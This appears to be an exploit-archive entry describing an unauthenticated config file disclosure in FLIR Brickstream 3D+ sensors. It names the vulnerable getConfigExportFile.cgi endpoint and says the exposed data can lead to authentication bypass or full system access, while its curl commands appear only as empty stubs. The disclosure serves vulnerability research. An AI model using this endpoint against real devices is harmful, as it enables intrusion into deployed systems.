Flir brickstream 3d+ 2.1.742.1842 config file disclosure Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-10-15 | Type : webapps | Platform : hardware
This exploit / vulnerability Flir brickstream 3d+ 2.1.742.1842 config file disclosure is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page:
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif:
# Tested on: Titan, Api/1.0.0
# References:
# ZSL-2018-5495

# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
# download and file disclosure vulnerability when calling the ExportConfig REST
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
# information and help her in authentication bypass, privilege escalation and/or
# full system access.

$ curl
$ curl
$ curl